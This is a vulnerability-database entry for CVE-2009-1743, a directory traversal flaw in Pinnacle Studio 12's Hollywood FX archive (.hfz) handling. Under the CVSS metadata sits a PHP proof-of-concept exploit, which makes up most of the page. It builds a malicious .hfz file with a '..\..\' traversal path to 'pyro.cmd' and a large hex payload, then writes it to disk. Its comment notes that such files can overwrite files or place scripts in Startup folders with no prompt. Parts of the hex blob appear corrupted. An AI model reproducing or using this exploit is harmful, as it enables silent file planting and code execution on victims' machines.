Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal

2009-05-21 / 2009-05-22
Credit: ipsdix
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1743
CWE: CWE-22


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<?php /* Pinnacle Studio 12 "Hollywood FX Compressed Archive" (.hfz) directory traversal vulnerability poc by Nine:Situations:Group::pyrokinesis Our site: http://retrogod.altervista.org/ Software site: http://www.pinnaclesys.com/ Some keys exported from the registry: [HKEY_CLASSES_ROOT\.hfz] @="hfzfile" [HKEY_CLASSES_ROOT\.hfz\hfzfile] [HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew] [HKEY_CLASSES_ROOT\hfzfile] @="Hollywood FX Compressed Archive" [HKEY_CLASSES_ROOT\hfzfile\DefaultIcon] @="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BE E02B_CF3C_4710_85A0_92A3876E6F9C,0" [HKEY_CLASSES_ROOT\hfzfile\shell] [HKEY_CLASSES_ROOT\hfzfile\shell\Open] [HKEY_CLASSES_ROOT\hfzfile\shell\Open\command] @="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe \" \"%1\"" "command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,3 8,00, 79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00, 58, 00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34, 00, 70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00, 31, 00,22,00,00,00,00,00 Usually files are decompressed in a Pinnacle effects folder... Problem is ... that .hfz files can be used to overwrite files on the target system or placing scripts in Startup folders by directory traversal attacks and InstallHFX.exe decompresses them with no prompts! Just modified an existing .hfz file and here it is the dump ... Also I experienced some crashes in doing this... investigating... */ $____path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd"; $____payload = "\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00". "\x00\x21\x00\x00\x00\x7e". $____path. "\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a". "\x78\x9c\xbd\x59\x7b\x4c\x53\x57\x1c\xbe\x05\xf6\x10\x96\x6c\x0b". "\x33\xab\x2f\x5a\x2d\xe0\xe4\xdd\xd6\x84\xf2\x18\xbd\x2d\x6f\x04". "\x8a\xa5\x50\x44\x50\xcb\x1b\x05\x8a\x3c\xb4\x22\x8e\x25\x26\xcb". "\xd4\x64\xee\x8f\x2d\x9b\xcb\xe6\xd4\x2c\x21\xd3\x65\x6e\x59\xa2". "\x5b\x8c\x01\x97\xa8\x89\xc1\x05\xf7\xd7\xd8\x12\xcd\xc8\x12\x51". "\xf7\x62\xe0\x03\x5f\x77\xdf\xed\x69\x2f\xb7\xb7\xb7\xb7\xe5\xb2". "\xec\xe4\x77\x2e\xe7\x9e\x7b\xce\xef\x7c\xf7\xfb\x3d\xce\xb9\xa5". "\xa8\xa0\x26\xbf\x28\x3f\x4f\x97\x42\x51\x54\x24\xaa\xd9\x54\x99". "\x5c\xd1\xde\xad\x4e\xd3\xe3\x86\x3a\xd4\xd1\x9a\x13\x45\x7a\x93". "\x2a\x4a\x51\xad\x16\xb6\x5b\x41\x29\x5c\x54\x71\x59\xa1\x76\xf0". "\x15\x8a\x0a\x53\x84\x47\xa4\xa1\x33\x16\xd5\xfb\x37\x70\x79\xd3". "\xc8\xaf\x76\x3b\x13\x54\xaa\xab\x9f\x86\x32\xec\x3f\x97\x50\xd 6". "\x4d\x4c\x1c\x0a\x2a\x09\x09\x6f\x48\x0f\x08\x65\xa1\xaa\xaa\x27". "\x16\xcb\x7d\xc8\x22\xf1\x00\x4c\x7a\xfa\x90\x46\xb3\x3b\x14\xe4". "\x44\x44\x17\x6a\x69\x61\x76\xee\x64\x6c\xb6\xc7\x10\x09\x3c\x4c". "\x5c\x9c\x3c\x79\x1a\x1b\xcb\xbf\x95\xc6\xd3\xdd\xcd\x6c\xde\xcc". "\x6c\xdc\x38\x07\x7e\x9c\x4e\xc6\x6a\x7d\x88\x76\x40\x3c\xa9\xa9". "\xf7\x56\xae\x0c\x02\x20\x21\xe1\xa1\x5a\x2d\x31\x60\xe2\xcc\x19". "\xbe\xf8\x2f\x04\x0c\xe0\x07\xd7\xca\xca\x47\x5b\xb7\x32\xa5\xa5". "\xb3\x25\x25\xff\x04\xe4\x67\xfd\xfa\x07\x31\x31\x8f\xd7\xac\x09". "\xb4\x1c\xc0\xb0\x78\xd2\xd3\xef\xaf\x5a\x25\x0f\x0f\x64\x60\x80". "\xb5\x17\x50\xa1\x8d\x6b\x4d\x0d\x53\x5b\x1b\x00\x0f\x4d\x33\x26". "\x93\xc0\x04\x44\xe6\x62\x63\x87\x95\x4a\xc8\x1d\x70\xa8\xd5\x4a". "\xf0\x33\x7b\xed\xda\x0f\xa7\x4e\x49\xe0\x81\xdb\x13\x4e\x60\x3e". "\xc2\x18\xb1\x1a\xdf\xc9\xe7\x75\xc6\xc7\xcf\xa9\x54\xb3\xcb\x97". "\x0b\x50\x4d\xb9\xcb\x65\x9b\x6b\x9a\xb0\x97\x98\xc8\xac\x5d\x8b". "\xc6\xa3\xd5\xab\xfd\xf9\xf9\xf1 \xf4\x69\x09\x3c\x44\x0a\x0b\xff". "\x22\x60\x7a\x7a\x3c\x44! \x01\xe7 \x86\x0d\x33\xe4\x29\x56\xf7\x01". "\x60\x36\xb3\x0b\xe9\xf5\x5c\xe7\x6d\x77\x99\xd8\xba\x7f\x9a\xb3". "\xa6\xc1\xc0\x5e\x4d\x26\x51\x7b\x4d\x5d\xbc\x28\x8d\x07\x02\x4b". "\x11\x5a\x9a\x9b\x59\x3c\xad\xad\xec\x6d\x47\x87\x78\x7c\xb1\x48". "\x52\x53\xe1\xc0\x84\x01\x82\xe7\x6a\xcd\xc0\xb4\xc0\xbb\x32\x32". "\xf8\x2f\x12\x8a\xff\x08\xa4\xa8\xe8\x6f\xe0\x81\xc9\xca\xcb\xef". "\x21\x1b\x80\xb1\x80\xf1\x1e\x1f\xef\x01\x96\x99\x49\xf0\x7c\x91". "\xd7\x26\xc4\xc3\x49\x72\x32\xae\x93\x23\x23\x0b\xc5\x43\x04\x90". "\x20\x68\xec\xd8\xc1\x72\x25\x11\xc2\x0f\xd6\xac\x99\xd1\x68\x08". "\x9e\xc3\x7a\x3b\xf0\xf8\x3b\x3c\xd7\xf3\xf3\xd9\xb3\x80\x71\x65". "\x78\x78\xa1\x78\x88\xa5\x90\x04\x48\xdc\x91\xe0\x12\x8d\xe2\xdf". "\xba\x3e\x44\x58\x11\x3c\xfb\xd3\x6c\x1c\x3f\xa2\x61\x48\x60\x5c". "\x3f\x77\x4e\x06\x1e\x22\x34\x3d\x55\x5f\xcf\x20\xa0\xe0\xc3\xac". "\xce\xec\x6c\xc1\x8b\x03\x46\xd2\xd2\xd5\x04\xcf\x50\x8a\x15\x78". "\x66\x96\x2d\x93\x88\x77\x79\xf6\xe2\x0b\xd2\x91\x27\xc9\xa8\x54". "\x 82\x64\x48\xf0\x70\x65\xdf\x6b\x65\x7f\xa8\x54\x4f\x34\x1a\x8c". "\x14\xc5\x83\x80\xad\xab\x63\x75\xba\x5c\x9e\xd4\x27\x0f\x12\x5f". "\xe7\xdd\x15\x2b\x18\xa3\x91\x6f\x3b\x0e\xcf\x50\x42\xb9\xc7\x5e". "\x08\xf3\x82\x02\x7f\x3c\x44\x1b\x49\x74\x48\xc2\xc8\x2d\xd8\xd0". "\x17\x89\x87\x64\x39\x6c\x1c\x10\x01\xa4\xb7\x12\xca\x89\xdb\x60". "\x00\x1a\xe4\xea\x8f\x67\xef\x5e\xa6\xa2\xe2\xc1\xf6\xed\x32\xc9". "\x09\x18\xef\x49\x49\xdc\xee\x79\x43\xad\xbe\x2c\xd8\x6d\xe3\xe3". "\x81\x07\xb6\xf3\xc7\x63\x77\x6f\x0a\x70\x4b\xd1\xb5\xf2\xf2\x7e". "\x97\x89\x87\x64\xe0\x94\x14\xa9\x7d\xdf\x68\x84\xcb\x71\xc0\x82". "\x2e\xb4\x6b\x17\x0b\x15\x3b\xbb\x1c\x3c\x71\x71\xac\x17\x91\xb8". "\x93\x90\xac\x2c\xce\xb2\xd2\xab\x20\xbd\x60\x77\x40\x86\x41\x1e". "\x16\x3d\xf9\x70\x27\xcc\x20\x2b\x86\x2c\x12\x60\xb0\x5b\xc1\xc3". "\xe1\xea\x84\x1c\x04\x20\x12\x20\x4e\x65\x12\x53\x2c\x96\x5b\x34". "\x7d\x2e\x3b\xfb\xeb\xf0\xf0\xe7\x15\x0a\xc5\xf8\xf8\x38\x17\x59". "\x4a\xa5\xb2\x25\xc1\x66\x30\x0c\xe7\xe 5\x9d\xed\xef\x9f\x95\xed". "\xa8\x90\xe2\xe2\x69\x72\x50\x0! 4\x1b\x8 8\x3e\x89\x00\x3c\x5a\xff". "\xd5\x65\xc7\xe1\x0f\x8a\x9d\x1f\x97\xb8\xb0\xb4\xc9\x74\xe1\xd2". "\xa5\x4b\x1c\xa4\x88\xb0\x70\xbb\xe9\xdd\xa2\xa2\xef\x2a\x2b\xef". "\x6d\xd9\xc2\x1e\xed\xf8\x0c\x87\xfe\xb5\x82\xd0\xc3\x60\xd8\x0e". "\x48\x36\x6d\x62\x7b\xba\xba\x44\x86\x61\x39\x7c\x36\x69\x34\x9a". "\xba\xba\xfa\x77\x68\x27\xf0\x64\x64\x7c\x8e\x1e\x0e\x0f\xda\xb5". "\xba\x01\x9a\xbe\x68\xb3\x3d\x82\x4e\x37\x9f\xf7\x17\xf3\xd1\x84". "\x97\xb2\xf3\x92\x15\xd9\x4f\x39\x99\x98\x98\x20\xeb\xe2\xdc\x65". "\x50\x26\xef\xd1\x37\x64\x19\x3e\x8b\x8a\x8a\xe2\xe3\xc9\x32\x9c". "\xac\xa8\xb8\xd3\xde\xce\x8e\x87\x1b\x00\x0c\xf4\x2c\x06\x12\x72". "\x14\xdc\x1b\x2c\x35\x34\x30\x4d\x4d\x9e\xc3\x06\x61\x9b\x4f\x85". "\xcb\xe5\x22\x5f\x99\xfc\xcd\xe2\x99\xb0\x88\x92\x92\x5f\x0a\x0a". "\xfe\xc4\x78\xf8\x21\x08\x07\x4b\x7d\x7d\x8c\xc3\xc1\x48\x7f\xbc". "\x04\x75\x72\xac\x0e\xdf\x6e\x6b\x63\x4d\x09\x23\x92\xd0\x4b\x4d". "\x3d\x74\x3b\x70\x01\xc2\xda\x9c\x63\x55\x55\x8f\x89\x12\x4c\x21". "\xd2\xd8 xc8\x12\x0e\x9d\x38\x4d\xc9\x66\x69\xdb\x36\x76\x5b\x81". "\x12\xe0\x21\xa9\x60\x70\x90\xed\x17\x10\xc2\x95\xc9\xc9\x49\xda". "\xf0\x49\x75\xb5\x30\x10\xb8\x2f\x17\x38\x52\x6f\xaf\xd4\xf7\x54". "\x50\x41\x74\xec\xde\xed\xc9\x4b\x50\x88\x36\x10\xe2\xd8\x1f\x1d". "\x9d\x0e\x2a\x38\x24\x37\x6f\xde\x8c\x8c\x8c\xb4\x5a\x67\x02\xe9". "\x01\x12\x58\x1f\xc1\x8b\xb7\x83\x06\xec\x5c\x65\x65\x77\x65\x13". "\x05\xc1\x7b\xd9\xdd\x99\x13\x0a\xe1\x51\xa4\x93\xa6\xcf\x47\x46". "\xc6\x28\x95\x85\x36\x5b\x90\x0f\x6d\xbb\x7b\x0b\x20\xfe\x83\x78". "\x21\x9c\xcb\x76\x27\xbb\x3b\x3b\xe1\x8a\xbd\x0f\x07\x57\x34\x48". "\x42\x58\x28\xed\xb0\x54\x67\x27\x1b\x14\x08\x3d\x72\xe0\x44\xbc". "\xc8\x86\x04\x72\x48\x03\x84\x93\x2c\x07\xce\x83\x6e\x79\xfe\x82". "\xb4\x06\xae\xc8\xdb\xe5\xe6\xde\xe1\x82\xd7\x5f\x42\x4c\x11\xe4". "\x68\x07\x6f\x87\xc8\xce\x2a\x5c\xc0\xf6\xf7\x33\x24\x53\xc9\x16". "\xd0\x02\x25\x7b\xf6\x2c\x4a\x89\xc9\x74\x0b\x2e\x84\x24\x40\x72". "\xf8\xe2\x45\xde\x09\x53\x20\x41\x7f\x71\xfa\x ff\x85\x6f\x71\x4b". "\x85\x4d\x67\x45\x7a\x9b\x0a\x9f\xff\x! 75\x91\x 2b\x0a\x4f\x25\x17". "\xae\xc1\xfe\xf0\x48\xb3\x8d\x70\xfe\x14\x3c\x8a\xe1\xcd\x3d\x92". "\x5f\x5e\xad\x9d\x43\x63\xfc\x39\xaf\x66\x93\x8a\xb4\xc2\xa9\x08". "\xd1\x5f\x36\x97\x84\xf4\xab\xe7\xd5\xb1\xd2\x1c\xe1\xbc\x0b\x63". "\xa5\xc6\xd6\x96\xf8\x11\x8a\x1a\x1d\xf1\x7d\x46\x1b\xbd\xf5\xea". "\xd8\x98\xcf\x3c\x05\x59\x6f\x54\xaf\xff\x06\x73\xe8\x51\xc1\x82". "\xc6\xf9\xea\xc3\x49\xe8\xf3\xbc\x04\x5c\xe3\x08\x30\x87\x42\x00". "\x1d\x4c\xf1\x47\x47\x96\x89\x01\x0a\x3a\x0f\xc4\x19\x7d\x1f\x2d". "\xa1\xd2\x22\xed\x23\x85\xbf\x66\x4a\x12\x27\x24\x20\x54\x43\x51". "\x65\xf9\x79\x5a\xd6\xb7\x8e\xbd\x38\xff\x88\xa2\x5e\x40\x2d\x72". "\xf6\xf6\xa9\xab\xdb\x9b\x9a\x9d\x6a\xbd\xf0\x3e\x82\xe2\x8f\x16". "\x96\x97\xd6\xe2\x72\xc4\xab\xf9\xb8\x94\x66\xad\xf0\x7e\x21\x9a". "\x4f\x48\x69\xd6\x09\xef\x43\xd1\x5c\x69\x2d\xd0\x9e\x44\xe3\xed". "\x68\xfe\x58\xf7\x7f\x0c\x1c\x8d\x3b\x9a\x7a\x9c\xdd\x6a\x3d\x45". "\x0d\x19\xe7\xab\xb8\x36\x91\xa2\xa0\xc2\x28\x12\x93\x34\xed\x3f". "\xcd\x4b\xbf\x58 \xe1\x59\xab\xc9\x8b\x14\x25\xcc\x7d\x65\x11\x0f". "\xe3\xef\x01\x1f\xc4\xac\x37\x7b\x08\x15\x81\xcb\xd5\xf3\x5d\xd4". "\x20\xfa\xcc\x22\x60\xa5\xe1\x1e\x0f\x09\x2e\xfb\x3f\x95\x68\x4f". "\x65\xdb\x2f\xcf\xc3\x3d\x18\x00\xae\x4e\x16\xbb\xc1\xe0\x9e\x90". "\x0b\x37\xd7\x54\xa6\xeb\x45\xb3\xfb\x55\x3e\x5c\xf6\x61\x99\xa3". "\xbd\x4b\x9d\xeb\xe8\x6c\xee\x71\xf8\x68\xa3\x03\x69\xbf\xd2\x13". "\x6b\x46\x7a\x7b\x9d\xa2\xb6\x99\xac\xdf\x1e\xcd\xf1\x56\xf6\x99". "\xe2\xbd\xf7\xa3\x15\x0a\xde\x34\xd7\xf5\xf5\x16\x73\x89\xf6\x53". "\x34\x69\x15\x7f\xe9\x67\x29\xe2\x8a\x6a\xfd\x3a\xb4\xf6\x76\xf7". "\x38\x9b\xba\x1d\x7d\x6d\xfb\x32\x2d\x0d\xdb\x9b\x1b\xfb\x7a\x33". "\xd3\xd2\xd4\xc9\xea\x5c\x67\x67\xa7\xb3\x2b\x93\x0c\x4c\x69\x6b". "\x71\x0a\x40\x8d\x0a\x38\xa0\x79\x55\xbc\x28\xdc\x21\x21\xdc\x3e". "\x10\x84\x5e\x98\x26\x3f\x98\x05\x1d\x8e\x3e\xb5\x36\x04\x98\x64". "\xa0\x17\x66\x65\xd6\x8d\x9c\x75\x75\xc6\x91\xef\xef\xfe\xe4\x93". "\xed\x96\x7e\x99\x6e\xf4\x56\x0f\x24\x31\x98\x07\xa4 x61\x9a\xc5". "\x61\xea\x42\x85\xa9\xe3\xb1\x19\x34\x99\x4b\! xc0\x3cx28\x0e\xf3". "\x5f\x77\x19\xc2\x8e\x00\x00\x48\x46\x58\x5a\x28\x00\x00\x00\x44". "\x00\x00\x00\x00\x11\x00\x00\x00\x7e\x6f\x72\x67\x73\x3a\x65\x66". "\x66\x65\x63\x74\x73\x2e\x6f\x72\x67\x00\x00\x00\x00\x00\x00\x00". "\x00\x00\x00\x00\x00\x34\x00\x00"; $_f = fopen("puf.hfz", "w+"); fputs($_f, $____payload); fclose($_f); ?> # original url: http://retrogod.altervista.org/9sg_pinnacle_studio_12_hfz.htm

References:

http://retrogod.altervista.org/9sg_pinnacle_studio_12_hfz.htm


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top